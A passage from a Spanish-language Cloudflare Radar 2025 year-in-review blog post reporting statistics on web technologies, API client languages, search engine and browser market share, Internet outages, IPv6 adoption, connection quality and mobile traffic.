          </figure><p><i><sup>Principales tecnologías de sitios web, categoría de bibliotecas de JavaScript en 2025</sup></i></p><p><a href="https://wordpress.org/"><u>WordPress</u></a> siguió siendo el sistema de gestión de contenido (CMS) más popular, aunque su cuota de sitios web analizados se redujo al 47 %, y la diferencia se distribuyó entre los avances registrados por varios competidores. <a href="https://www.hubspot.com/"><u>HubSpot</u></a> y <a href="https://business.adobe.com/products/marketo.html"><u>Marketo</u></a> siguieron siendo las principales plataformas de automatización de marketing, con una cuota combinada un 10 % superior en términos interanuales. Entre las herramientas de pruebas A/B, la cuota de <a href="https://vwo.com/"><u>VWO</u></a> creció ocho puntos porcentuales respecto al año anterior, ampliando su ventaja sobre <a href="https://www.optimizely.com/"><u>Optimizely</u></a>, mientras que <a href="https://support.google.com/analytics/answer/12979939?hl=en"><u>Google Optimize</u></a>, que se eliminó en septiembre de 2023, vio caer su cuota del 14 % al 4 %.</p>
    <div>
      <h3>Una quinta parte de las solicitudes de API automatizadas fueron enviadas por clientes de Go</h3>
      <a href="#una-quinta-parte-de-las-solicitudes-de-api-automatizadas-fueron-enviadas-por-clientes-de-go">
        
      </a>
    </div>
    <p>Las interfaces de programación de aplicaciones (API) son la base de los sitios web dinámicos modernos y de las aplicaciones web y nativas. Estos sitios y aplicaciones dependen en gran medida de las llamadas API automatizadas para proporcionar información personalizada. Mediante el análisis del tráfico web protegido y entregado por Cloudflare, podemos identificar las solicitudes que se realizan a los puntos finales de la API. Mediante la aplicación de heurística a estas solicitudes relacionadas con API que se ha determinado que no proceden de una persona que utiliza un navegador o una aplicación móvil nativa, podemos identificar los <a href="https://radar.cloudflare.com/year-in-review/2025/#api-client-language-popularity"><u>principales lenguajes utilizados para crear clientes API</u></a>.</p><p>En 2025, el 20 % de las llamadas API automatizadas fueron realizadas por clientes basados en Go, lo que representa un crecimiento significativo con respecto al 12 % de la cuota de Go en 2024. La cuota de Python también aumentó interanualmente, del 9,6 % al 17 %. Java saltó al tercer lugar, alcanzando una cuota del 11,2 %, frente al 7,4 % en 2024. <a href="http://node.js"><u>Node.js</u></a>, el segundo lenguaje más popular el año pasado, vio cómo su cuota caía hasta el 8,3 % en 2025, lo que la relegó al cuarto puesto, mientras que .NET se mantuvo en el último lugar de los cinco primeros, con una caída hasta el 2,3 %.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4tntP1mMqqsH5Bjj0r6xyc/0b03ad6b7257b7b935e102d78ec6bdb4/BLOG-3077_36_-_image56.png" />
          </figure><p><i><sup>Lenguajes de clientes API automatizados más populares en 2025</sup></i></p>
    <div>
      <h3>Google sigue siendo el motor de búsqueda líder, seguido de lejos por Yandex, Bing y DuckDuckGo</h3>
      <a href="#google-sigue-siendo-el-motor-de-busqueda-lider-seguido-de-lejos-por-yandex-bing-y-duckduckgo">
        
      </a>
    </div>
    <p>Cloudflare se encuentra en una posición única para <a href="https://radar.cloudflare.com/year-in-review/2025/#search-engine-market-share"><u>medir la cuota de mercado</u></a> de los motores de búsqueda, ya que protegemos sitios web y aplicaciones para millones de clientes. Con ese fin, desde el cuarto trimestre de 2021, hemos estado publicando <a href="https://radar.cloudflare.com/reports"><u>informes</u></a> trimestrales sobre estos datos. Utilizamos el <a href="https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Referer"><u>encabezado HTTP referer</u></a> para identificar el motor de búsqueda que envía tráfico a los sitios y aplicaciones de los clientes, y presentamos los datos de cuota de mercado como un agregado global, así como desglosados por tipo de dispositivo y sistema operativo. (La información sobre el tipo de dispositivo y el sistema operativo se basa en los encabezados de solicitud HTTP <a href="https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/User-Agent"><u>User-Agent</u></a> y <a href="https://developer.mozilla.org/en-US/docs/Web/HTTP/Client_hints"><u>Client Hints</u></a>).</p><p>A nivel mundial, Google dirigió la mayor parte del tráfico a sitios protegidos y entregados por Cloudflare, con una cuota de casi el 90 % en 2025. Los otros motores de búsqueda entre los 5 principales son Bing (3,1 %), Yandex (2 %), Baidu (1,4 %) y DuckDuckGo (1,2 %). Si observamos las tendencias a lo largo del año, Yandex cayó del 2,5 % en mayo al 1,5 % en julio, mientras que Baidu creció del 0,9 % en abril al 1,6 % en junio.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/7As9GnMsW9ru3h0RaH0zoX/55e396801f33af890b24aa871f989be5/BLOG-3077_37_-_adoption-searchenginemarketshare.png" />
          </figure><p><i><sup>Cuota de mercado global de los motores de búsqueda en 2025, a nivel mundial</sup></i></p><p>Los usuarios de Yandex se encuentran principalmente en <a href="https://radar.cloudflare.com/year-in-review/2025/ru#search-engine-market-share"><u>Rusia</u></a>, donde la plataforma nacional tiene una cuota de mercado del 65 %, casi el doble que la de Google, que es del 34 %. En la <a href="https://radar.cloudflare.com/year-in-review/2025/cz#search-engine-market-share"><u>República Checa</u></a>, los usuarios prefieren Google (84 %), pero la cuota del 7,7 % del motor de búsqueda local Seznam es un resultado sólido en comparación con los motores de búsqueda que ocupan el segundo lugar en otros países. </p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/fUk9r7hXP0SaMiFiFa3UK/ea4e213f4ac2fb55273e731eacdc10a4/BLOG-3077_38_-_adoption-searchenginemarketshare-czechrepublic.png" />
          </figure><p><i><sup>Cuota de mercado global de los motores de búsqueda en 2025 | República Checa</sup></i></p><p>Para el tráfico de sistemas de "escritorio" agregados globalmente, la cuota de mercado de Google desciende a cerca del 80 %, mientras que la de Bing aumenta a casi el 11 %. Probablemente, esto se deba al continuo dominio del mercado por parte de los sistemas basados en Windows: en Windows, Google remite solo el 76 % del tráfico, mientras que Bing remite alrededor del 14 %. En cuanto al tráfico de dispositivos móviles, Google posee casi el 93 % de la cuota de mercado, siendo esta cuota la misma para el tráfico procedente de dispositivos Android y iOS.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5ATWm3D3Jp8v0Pob2qibkw/71869e620f0ec7fb42e636d8da6840d7/BLOG-3077_39_-_adoption-searchenginemarketshare-windows.png" />
          </figure><p><i><sup>Cuota de mercado global de los motores de búsqueda en 2025, sistemas basados en Windows</sup></i></p><p>Para obtener más información, que incluye motores de búsqueda combinados en "Otros", consulta los <a href="https://radar.cloudflare.com/reports/search-engines"><u>informes trimestrales de referencia de motores de búsqueda </u></a>en Cloudflare Radar.</p>
    <div>
      <h3>Chrome sigue siendo el navegador principal en todas las plataformas y sistemas operativos, excepto en iOS, donde Safari tiene la mayor cuota</h3>
      <a href="#chrome-sigue-siendo-el-navegador-principal-en-todas-las-plataformas-y-sistemas-operativos-excepto-en-ios-donde-safari-tiene-la-mayor-cuota">
        
      </a>
    </div>
    <p>Cloudflare también se encuentra en una posición única para medir la <a href="https://radar.cloudflare.com/year-in-review/2025/#browser-market-share"><u>cuota de mercado de navegadores</u></a>, y llevamos varios años publicando <a href="https://radar.cloudflare.com/reports"><u>informes</u></a> trimestrales sobre el tema. Para identificar el navegador y el sistema operativo asociado que realiza las solicitudes de contenido, utilizamos información de los encabezados HTTP <a href="https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/User-Agent"><u>User-Agent</u></a> y <a href="https://developer.mozilla.org/en-US/docs/Web/HTTP/Client_hints"><u>Client Hints</u></a>. Presentamos los datos sobre la cuota de mercado de los navegadores tanto de forma combinada como desglosados por tipo de dispositivo y sistema operativo. Ten en cuenta que las cuotas de mercado de los navegadores disponibles tanto en ordenadores de sobremesa como en dispositivos móviles, como Google Chrome o Apple Safari, se presentan de forma agregada.</p><p>A nivel mundial, dos tercios del tráfico de solicitudes a Cloudflare provinieron de Chrome en 2025, un porcentaje similar al del año anterior. Safari, disponible exclusivamente en dispositivos Apple, fue el segundo navegador más popular, con una cuota de mercado del 15,4 %. Les siguieron Microsoft Edge (7,4 %), Mozilla Firefox (3,7 %) y Samsung Internet (2,3 %). </p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6NH8hVOr8lxytXTdrCARAk/ac7173e80db1b39da11c2564a3ae4980/BLOG-3077_40_-_adoption-browsermarketshare.png" />
          </figure><p><i><sup>Cuota de mercado de los navegadores en 2025, a nivel mundial</sup></i></p><p>En <a href="https://radar.cloudflare.com/year-in-review/2025/ru#browser-market-share"><u>Rusia</u></a>, Chrome sigue siendo el más popular, con una cuota del 44 %, pero el navegador nacional Yandex ocupa el segundo lugar con una cuota de mercado del 33 %, en comparación con las cuotas inferiores al 10 % de Safari, Edge y Opera. Curiosamente, el navegador Yandex superó a Chrome en un punto porcentual (39 % frente a 38 %) en junio, antes de ceder una cuota de mercado significativa a Chrome a medida que avanzaba el año.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2PGmYbREZR4xvALWdrRqzF/737b9550291d3d5cacfc85cbe72e3551/BLOG-3077_41_-_adoption-browsermarketshare-Russia.png" />
          </figure><p><i><sup>Cuota de mercado global de los navegadores en 2025 | Rusia</sup></i></p><p>Como navegador predeterminado en iOS, Safari es, con diferencia, el navegador más popular en estos dispositivos, con una cuota de mercado del 79 %, cuatro veces la cuota del 19 % de Chrome. Menos del 1 % de las solicitudes proceden de DuckDuckGo, Firefox y QQ Browser (desarrollado en China por Tencent). Por el contrario, en Android, el 85 % de las solicitudes proceden de Chrome, mientras que el navegador Samsung Internet, proporcionado por el proveedor, ocupa un alejado segundo lugar con una cuota del 6,6 %. Huawei Browser, otro navegador proporcionado por el proveedor, ocupa el tercer lugar con solo un 1 %. Y a pesar de ser el navegador predeterminado en Windows, la cuota del 19 % de Edge es insignificante en comparación con Chrome, que lidera con una cuota del 69 % en ese sistema operativo.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/zXj6HWrNSNdAWnDXIrLc5/79b47c9671a1c7691b1fde68749d5812/BLOG-3077_42_-_adoption-browsermarketshare-ios.png" />
          </figure><p><i><sup>Cuota de mercado global de navegadores en 2025 para dispositivos iOS</sup></i></p><p>Para obtener más información, incluidos los navegadores agrupados en "Otros", consulta los <a href="https://radar.cloudflare.com/reports/browser"><u>informes trimestrales sobre la cuota del mercado de los navegadores</u></a> en Cloudflare Radar.</p>
    <div>
      <h2>Conectividad</h2>
      <a href="#conectividad">
        
      </a>
    </div>
    
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1ZkJ7IDSXBHzKnK9RSNHsY/f042e40576b2380a77282831fe194398/BLOG-3077_43_-_image13.png" />
          </figure>
    <div>
      <h3>Casi la mitad de las 174 interrupciones importantes de Internet observadas en todo el mundo en 2025 se debieron a cortes regionales y nacionales de la conectividad a Internet impuestos por los gobiernos</h3>
      <a href="#casi-la-mitad-de-las-174-interrupciones-importantes-de-internet-observadas-en-todo-el-mundo-en-2025-se-debieron-a-cortes-regionales-y-nacionales-de-la-conectividad-a-internet-impuestos-por-los-gobiernos">
        
      </a>
    </div>
    <p>Las interrupciones de Internet siguen siendo una amenaza constante, y el impacto potencial de estas interrupciones continúa creciendo, ya que pueden provocar pérdidas económicas, interrumpir servicios educativos y gubernamentales, y limitar las comunicaciones. Durante 2025, informamos sobre importantes interrupciones de Internet y sus causas asociadas en nuestras publicaciones trimestrales (<a href="https://blog.cloudflare.com/q1-2025-internet-disruption-summary/"><u>primer</u></a>, <a href="https://blog.cloudflare.com/q2-2025-internet-disruption-summary/"><u>segundo</u></a>, <a href="https://blog.cloudflare.com/q3-2025-internet-disruption-summary/"><u>tercer</u></a> trimestre), así como en publicaciones independientes que cubrían las principales interrupciones en Portugal, España y Afganistán. El <a href="https://radar.cloudflare.com/outage-center"><u>Centro de interrupciones de Cloudflare Radar</u></a> realiza un seguimiento de estas interrupciones de Internet y utiliza los datos de tráfico de Cloudflare para obtener información sobre su alcance y duración.</p><p>Casi la mitad de las <a href="https://radar.cloudflare.com/year-in-review/2025/#internet-outages"><u>interrupciones observadas</u></a> este año estuvieron relacionadas con los cortes de Internet destinados a evitar que se hagan trampas en los exámenes académicos. Países como <a href="https://x.com/CloudflareRadar/status/1930310203083210760"><u>Irak</u></a>, <a href="https://x.com/CloudflareRadar/status/1952002641896288532"><u>Siria</u></a> y <a href="https://blog.cloudflare.com/q3-2025-internet-disruption-summary/#sudan"><u>Sudán</u></a>, entre otros, volvieron a implementar cortes regulares de varias horas durante varias semanas en los periodos de exámenes. Se llevaron a cabo otros cierres impuestos por el Gobierno en <a href="https://x.com/CloudflareRadar/status/1924531952993841639"><u>Libia</u></a> y <a href="https://x.com/CloudflareRadar/status/1983502557868666900"><u>Tanzania</u></a> como respuesta a las protestas y los disturbios civiles, mientras que en <a href="https://blog.cloudflare.com/nationwide-internet-shutdown-in-afghanistan/"><u>Afganistán</u></a>, los talibanes ordenaron el cierre de la conectividad a Internet por fibra óptica en varias provincias como parte de una campaña para "prevenir la inmoralidad".</p><p>Los cortes de cable, que afectaron tanto a la infraestructura de fibra óptica submarina como doméstica, fueron también una de las principales causas de interrupciones de Internet en 2025. Estos cortes provocaron que los proveedores de red en países / regiones como <a href="https://blog.cloudflare.com/q3-2025-internet-disruption-summary/#texas-united-states"><u>Estados Unidos</u></a>, <a href="https://blog.cloudflare.com/q3-2025-internet-disruption-summary/#south-africa"><u>Sudáfrica</u></a>, <a href="https://blog.cloudflare.com/q2-2025-internet-disruption-summary/#digicel-haiti"><u>Haití</u></a>, <a href="https://blog.cloudflare.com/q3-2025-internet-disruption-summary/#pakistan-united-arab-emirates"><u>Pakistán</u></a> y <a href="https://x.com/CloudflareRadar/status/1910709632756019219"><u>Hong Kong</u></a> experimentaran interrupciones del servicio que duraron desde varias horas hasta varios días. Otras interrupciones notables incluyen una causada por un <a href="https://bsky.app/profile/radar.cloudflare.com/post/3ltf6jtxd5s2p"><u>incendio</u></a> en un edificio de telecomunicaciones en El Cairo, Egipto, que interrumpió la conectividad a Internet de múltiples proveedores de servicios durante varios días, y otra en <a href="https://x.com/CloudflareRadar/status/1983188999461319102"><u>Jamaica</u></a>, donde los daños causados por el huracán Melissa provocaron una disminución del tráfico de Internet desde la isla durante más de una semana.</p><p>En la <a href="https://radar.cloudflare.com/year-in-review/2025#internet-outages"><u>línea de tiempo</u></a> del micrositio Resumen del año, al pasar el cursor por encima de un punto se mostrará información sobre esa interrupción del servicio, y al hacer clic en él se accederá a información adicional.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/7gC9MsV4mObyNllxyQPzDy/cfe5dcee5e751e00309f7b4f6902a03e/BLOG-3077_44_-_connectivity-internetoutages.png" />
          </figure><p><i><sup>En 2025, se observaron más de 170 interrupciones importantes de Internet en todo el mundo.</sup></i></p>
    <div>
      <h3>A nivel mundial, menos de un tercio de las solicitudes de doble pila se realizaron a través de IPv6, mientras que en India, más de dos tercios lo hicieron</h3>
      <a href="#a-nivel-mundial-menos-de-un-tercio-de-las-solicitudes-de-doble-pila-se-realizaron-a-traves-de-ipv6-mientras-que-en-india-mas-de-dos-tercios-lo-hicieron">
        
      </a>
    </div>
    <p>El espacio de direcciones IPv4 disponible se ha agotado en gran medida desde hace una<a href="https://ipv4.potaroo.net/"><u> década o más</u></a>, aunque soluciones como la <a href="https://en.wikipedia.org/wiki/Network_address_translation"><u>traducción de direcciones de red</u></a> (NAT) han permitido a los proveedores de red ampliar los limitados recursos IPv4. Esto ha servido en parte para ralentizar la adopción de <a href="https://www.rfc-editor.org/rfc/rfc1883"><u>IPv6</u></a>, diseñado a mediados de la década de 1990 como protocolo sucesor de IPv4, y ofrece un espacio de direcciones ampliado destinado a mejorar la compatibilidad con el crecimiento previsto del número de dispositivos conectados a Internet.</p><p>Durante casi 15 años, Cloudflare también ha sido un defensor activo y vocal del IPv6, y ha lanzado soluciones como <a href="https://blog.cloudflare.com/introducing-cloudflares-automatic-ipv6-gatewa/"><u>Automatic IPv6 Gateway</u></a> en 2011, que permitió la compatibilidad gratuita con IPv6 para todos nuestros clientes, y la compatibilidad con IPv6 por defecto para todos nuestros clientes en 2014. En términos sencillos, la compatibilidad del lado del servidor es solo la mitad de lo que se necesita para impulsar la adopción de IPv6, ya que las conexiones de los usuarios finales también deben ser compatibles. Mediante la agregación y el análisis de la versión de IP utilizada para las solicitudes realizadas a Cloudflare a lo largo del año, podemos obtener información sobre la distribución del tráfico entre IPv6 e IPv4.</p><p><a href="https://radar.cloudflare.com/year-in-review/2025/#ipv6-adoption"><u>A nivel global</u></a>, el 29 % de las solicitudes de contenido compatibles con IPv6 ("<a href="https://www.techopedia.com/definition/19025/dual-stack-network"><u>doble pila</u></a>") se realizaron a través de IPv6, lo que supone un aumento de un punto porcentual con respecto al <a href="https://radar.cloudflare.com/year-in-review/2024#ipv6-adoption"><u>28 % registrado en 2024</u></a>. India volvió a encabezar la lista con una tasa de adopción de IPv6 del 67 %, seguida de solo otros tres países / regiones (<a href="https://radar.cloudflare.com/year-in-review/2025/my#ipv6-adoption"><u>Malasia</u></a>, <a href="https://radar.cloudflare.com/year-in-review/2025/sa#ipv6-adoption"><u>Arabia Saudí</u></a> y <a href="https://radar.cloudflare.com/year-in-review/2025/uy#ipv6-adoption"><u>Uruguay</u></a>) que también realizaron más de la mitad de este tipo de solicitudes a través de IPv6, al igual que el año pasado. Algunas de los mayores aumentos se observaron en <a href="https://radar.cloudflare.com/year-in-review/2025/bz#ipv6-adoption"><u>Belice</u></a>, que pasó del 4,3 % al 24 % interanual, y <a href="https://radar.cloudflare.com/year-in-review/2025/qa#ipv6-adoption"><u>Catar</u></a>, donde la adopción casi se duplicó hasta alcanzar el 33 % en 2025. Por desgracia, algunos países / regiones siguen estando por detrás de los líderes, siendo 94 los que registraron tasas de adopción inferiores al 10 %, entre ellos <a href="https://radar.cloudflare.com/year-in-review/2025/ru#ipv6-adoption"><u>Rusia</u></a> (8,6 %), <a href="https://radar.cloudflare.com/year-in-review/2025/ie#ipv6-adoption"><u>Irlanda</u></a> (6,5 %) y <a href="https://radar.cloudflare.com/year-in-review/2025/hk#ipv6-adoption"><u>Hong Kong</u></a> (3 %). Aún más rezagados están los 20 países / regiones con tasas de adopción inferiores al 1 %, tales como <a href="https://radar.cloudflare.com/year-in-review/2025/tz#ipv6-adoption"><u>Tanzania</u></a> (0,9 %), <a href="https://radar.cloudflare.com/year-in-review/2025/sy#ipv6-adoption"><u>Siria</u></a> (0,3 %) y <a href="https://radar.cloudflare.com/year-in-review/2025/gi#ipv6-adoption"><u>Gibraltar</u></a> (0,1 %).</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2NkFC1eLbAPdpJv6WPkvHT/26a260f8068656f8ed4aa0a28009a5d9/BLOG-3077_45_-_connectivity-ipv6.png" />
          </figure><p><i><sup>Distribución del tráfico por versión de IP en 2025, a nivel mundial</sup></i></p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3Mzu2k3Xs1YZVNhpZpx9xH/23d19f5057b52690e2def65bc2c9c64a/BLOG-3077_46_-_connectivity-ipv6-top5.png" />
          </figure><p><i><sup>Los cinco países con mayor adopción de IPv6 en 2025</sup></i></p>
    <div>
      <h3>Los países europeos registraron algunas de las velocidades de descarga más altas, todas superiores a 200 MB/s. España se mantuvo de manera constante entre los primeros puestos en todas las métricas de calidad de Internet evaluadas</h3>
      <a href="#los-paises-europeos-registraron-algunas-de-las-velocidades-de-descarga-mas-altas-todas-superiores-a-200-mb-s-espana-se-mantuvo-de-manera-constante-entre-los-primeros-puestos-en-todas-las-metricas-de-calidad-de-internet-evaluadas">
        
      </a>
    </div>
    <p>Durante la última década, hemos recurrido a las pruebas de velocidad de Internet para muchos fines: garantizar la honestidad de nuestros proveedores de servicios, solucionar problemas de conexión o presumir de una velocidad de descarga especialmente alta en las redes sociales. De hecho, nos hemos acostumbrado a centrarnos en las velocidades de descarga como la principal medida de la calidad de una conexión. Si bien es una métrica absolutamente importante, para casos de uso cada vez más populares, como las videoconferencias, la transmisión en directo y los videojuegos en línea, también son fundamentales una buena velocidad de carga y una baja latencia. Sin embargo, incluso cuando los proveedores de Internet ofrecen niveles de servicio que incluyen altas velocidades simétricas y una latencia más baja, la adopción por parte de los consumidores suele ser variable debido al coste, la disponibilidad u otros problemas.</p><p>Las pruebas en <a href="https://speed.cloudflare.com/"><u>speed.cloudflare.com</u></a> miden las velocidades de carga y descarga, así como la latencia en carga y descarga. Mediante la agregación de los resultados de las <a href="https://radar.cloudflare.com/year-in-review/2025/#internet-quality"><u>pruebas realizadas en todo el mundo durante 2025</u></a>, podemos obtener una perspectiva por país/región de los valores medios de estas métricas de <a href="https://developers.cloudflare.com/radar/glossary/#connection-quality"><u>calidad de conexión</u></a>, así como información sobre la distribución de las mediciones.</p><p>En 2025, Europa estuvo bien representada entre los países con las velocidades medias de descarga más altas. <a href="https://radar.cloudflare.com/year-in-review/2025/es#internet-quality"><u>España</u></a>, <a href="https://radar.cloudflare.com/year-in-review/2025/hu#internet-quality"><u>Hungría</u></a>, <a href="https://radar.cloudflare.com/year-in-review/2025/pt#internet-quality"><u>Portugal</u></a>, <a href="https://radar.cloudflare.com/year-in-review/2025/dk#internet-quality"><u>Dinamarca</u></a>, <a href="https://radar.cloudflare.com/year-in-review/2025/ro#internet-quality"><u>Rumanía</u></a> y <a href="https://radar.cloudflare.com/year-in-review/2025/fr#internet-quality"><u>Francia</u></a> se situaron entre los 10 primeros puestos, con velocidades medias de descarga superiores a 300 MB/s tanto en España como en Hungría. La media de España creció 25 MB/s desde 2024, mientras que la de Hungría aumentó 46 MB/s. Por su parte, los países asiáticos registraron muchas de las velocidades medias de subida más altas, situándose <a href="https://radar.cloudflare.com/year-in-review/2025/kr#internet-quality"><u>Corea del Sur</u></a>, <a href="https://radar.cloudflare.com/year-in-review/2025/mo#internet-quality"><u>Macao</u></a>, <a href="https://radar.cloudflare.com/year-in-review/2025/sg#internet-quality"><u>Singapur</u></a> y <a href="https://radar.cloudflare.com/year-in-review/2025/jp#internet-quality"><u>Japón</u></a>, entre los 10 primeros puestos, todos ellos con medias superiores a los 130 MB/s.</p><p>Sin embargo, España también encabezó la lista en la métrica de carga, con 206 MB/s, un aumento de 13 MB/s con respecto a 2024. El buen resultado del país en ambas métricas de velocidad es potencialmente atribuible a "<a href="https://commission.europa.eu/projects/unico-broadband_en"><u>UNICO-Broadband</u></a>", una "<i>convocatoria de proyectos de operadores de telecomunicaciones con el objetivo de desplegar infraestructura de banda ancha de alta velocidad capaz de proporcionar servicios a velocidades simétricas de al menos 300 MB/s, escalable a 1 GB/s</i>", cuyo objetivo es dar cobertura al 100 % de la población en 2025.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4pZCAQEMEmbUjXkIUzAwUP/8aec93e96debe19d496396a6e6cd1db7/BLOG-3077_47_-_connectivity-downloadspeeds.png" />
          </figure><p><i><sup>Países / regiones con las velocidades de descarga más altas en 2025, a nivel mundial</sup></i></p><p>Como se ha señalado anteriormente, se necesitan conexiones de baja latencia para proporcionar a los usuarios experiencias de <a href="https://www.screenbeam.com/wifihelp/wifibooster/how-to-reduce-latency-or-lag-in-gaming-2/#:~:text=Latency%20is%20measured%20in%20milliseconds,%2C%2020%2D40ms%20is%20optimal."><u>videojuegos</u></a> y <a href="https://www.haivision.com/glossary/video-latency/#:~:text=Low%20latency%20is%20typically%20defined,and%20streaming%20previously%20recorded%20events."><u>videoconferencia / streaming</u></a> eficaces. La <a href="https://blog.cloudflare.com/introducing-radar-internet-quality-page/#connection-speed-quality-data-is-important"><u>métrica de latencia</u></a> se puede dividir en latencia con carga y latencia en reposo. La primera mide la latencia en una conexión con carga, en la que se consume activamente el ancho de banda, mientras que la segunda mide la latencia en una conexión "en reposo", cuando no hay otro tráfico de red presente. (Estas definiciones corresponden a la perspectiva de la aplicación de prueba de velocidad). </p><p>En 2025, varios países europeos se encontraban entre los países con las latencias más bajas, tanto en reposo como con carga. En cuanto a la latencia media en reposo, <a href="https://radar.cloudflare.com/year-in-review/2025/is#internet-quality"><u>Islandia</u></a> midió la latencia más baja con 13 m/s, solo 2 m/s mejor que <a href="https://radar.cloudflare.com/year-in-review/2025/md#internet-quality"><u>Moldavia</u></a>. Además de estos dos, <a href="https://radar.cloudflare.com/year-in-review/2025/pt#internet-quality"><u>Portugal</u></a>, <a href="https://radar.cloudflare.com/year-in-review/2025/es#internet-quality"><u>España</u></a> y <a href="https://radar.cloudflare.com/year-in-review/2025/hu#internet-quality"><u>Hungría</u></a> también se situaron entre los 10 primeros, todos ellos con latencias medias en reposo inferiores a 20 m/s. Moldavia encabezó la lista de países / regiones con la latencia media de carga más baja, con 73 m/s. Hungría, España, <a href="https://radar.cloudflare.com/year-in-review/2025/be#internet-quality"><u>Bélgica</u></a>, Portugal, <a href="https://radar.cloudflare.com/year-in-review/2025/sk#internet-quality"><u>Eslovaquia</u></a> y <a href="https://radar.cloudflare.com/year-in-review/2025/si#internet-quality"><u>Eslovenia</u></a> también se situaron en los 10 primeros puestos, todos ellos con latencias medias de carga inferiores a 100 m/s.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4yFdtVsghuBNrCe0sqdEuS/1ed59c6a972f2c511ed567ef69863f39/BLOG-3077_48_-_connectivity-latency-moldova.png" />
          </figure><p><i><sup>Latencia con carga/en reposo medida | Moldavia</sup></i></p>
    <div>
      <h3>Londres y Los Ángeles fueron puntos clave para la actividad de pruebas de velocidad de Cloudflare en 2025</h3>
      <a href="#londres-y-los-angeles-fueron-puntos-clave-para-la-actividad-de-pruebas-de-velocidad-de-cloudflare-en-2025">
        
      </a>
    </div>
    <p>Como comentamos anteriormente, la prueba de velocidad en <a href="http://speed.cloudflare.com"><u>speed.cloudflare.com</u></a> mide las velocidades de conexión y la latencia de un usuario. Revisamos los resultados agregados de esas pruebas, destacando los países / regiones con los mejores resultados. Sin embargo, también nos preguntamos acerca de la actividad de pruebas en todo el mundo: ¿dónde se preocupan más los usuarios por la calidad de su conexión y con qué frecuencia realizan pruebas? <a href="https://radar.cloudflare.com/year-in-review/2025/#speed-tests"><u>Una nueva visualización animada del Resumen del año ilustra la actividad de las pruebas de velocidad</u></a>, agregada semanalmente.</p><p>Los datos se agregan a nivel regional y la actividad asociada se representa en el mapa, con círculos cuyo tamaño se basa en el número de pruebas realizadas cada semana. Ten en cuenta que las ubicaciones con menos de 100 pruebas de velocidad semanales no se representan. En cuanto al volumen de pruebas a lo largo del año, las áreas metropolitanas de Londres y Los Ángeles fueron las más activas, al igual que Tokio, Hong Kong y varias ciudades de Estados Unidos.</p><p>Si animamos el gráfico para ver los cambios a lo largo del año, se observan varios aumentos semanales en el volumen de pruebas. Entre ellos se incluyen los registrados en la zona de Nairobi (Kenia) durante el periodo de siete días que finalizó el 10 de junio, en la zona de Teherán (Irán) durante el periodo que finalizó el 29 de julio, en varias zonas de Rusia durante el periodo que finalizó el 5 de agosto, y en la zona de Karnataka (India) durante el periodo que finalizó el 28 de octubre. No está claro qué impulsó estos aumentos en el volumen de pruebas. El <a href="https://radar.cloudflare.com/outage-center?dateStart=2025-01-01&amp;dateEnd=2025-12-02"><u>Centro de interrupciones de Cloudflare Radar</u></a> no muestra ninguna interrupción de Internet observada que haya afectado a esas zonas en ese momento, por lo que es poco probable que se trate de suscriptores que estén probando el restablecimiento de la conectividad.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/73PtVEdvkENBbF5O8qD8ij/482d15f05359cbf6ae24fb606ed61793/BLOG-3077_49_-_connectivity-globalspeedtestactivity.png" />
          </figure><p><i><sup>Actividad de pruebas de velocidad de Cloudflare por ubicación en 2025</sup></i></p>
    <div>
      <h3>Más de la mitad del tráfico de solicitudes procede de dispositivos móviles en 117 países / regiones</h3>
      <a href="#mas-de-la-mitad-del-trafico-de-solicitudes-procede-de-dispositivos-moviles-en-117-paises-regiones">
        
      </a>
    </div>
    <p>Para bien o para mal, en el último cuarto de siglo, los dispositivos móviles se han convertido en una parte indispensable de la vida cotidiana. La adopción varía en todo el mundo: las estadísticas del <a href="https://blogs.worldbank.org/en/voices/Mobile-phone-ownership-is-widespread-Why-is-digital-inclusion-still-lagging"><u>Banco Mundial</u></a> muestran que, a octubre de 2025, varios países y regiones tienen una tasa de propiedad de teléfonos móviles superior al 90 %, mientras que en otros la tasa es inferior al 10 %. En algunos países / regiones, los dispositivos móviles se conectan principalmente a Internet a través de wifi, mientras que en otros países / regiones se da prioridad a los dispositivos móviles, donde los servicios 4G / 5G son el principal medio de acceso a Internet.</p><p>La información contenida en el encabezado <a href="https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/User-Agent"><u>User-Agent</u></a> incluido en cada solicitud a Cloudflare nos permite clasificarla como procedente de un dispositivo móvil, de escritorio u otro tipo de dispositivo. <a href="https://radar.cloudflare.com/year-in-review/2025/#mobile-vs-desktop"><u>La agregación de esta categorización a nivel mundial en 2025</u></a> reveló que el 43 % de las solicitudes procedían de dispositivos móviles, frente al <a href="https://radar.cloudflare.com/year-in-review/2024#mobile-vs-desktop"><u>41 % en 2024</u></a>. El resto provenía de dispositivos de tipo portátil y de escritorio “clásicos”. Al igual que en una observación <a href="https://blog.cloudflare.com/radar-2024-year-in-review/#41-3-of-global-traffic-comes-from-mobile-devices-in-nearly-100-countries-regions-the-majority-of-traffic-comes-from-mobile-devices"><u>realizada el año pasado</u></a>, estas cuotas de tráfico coincidían con las medidas en los informes de Resumen del año que se remontan a 2022, lo que sugiere que el uso de dispositivos móviles ha alcanzado un "estado estable".</p><p>En 117 países / regiones, más de la mitad de las solicitudes procedían de dispositivos móviles, lideradas por <a 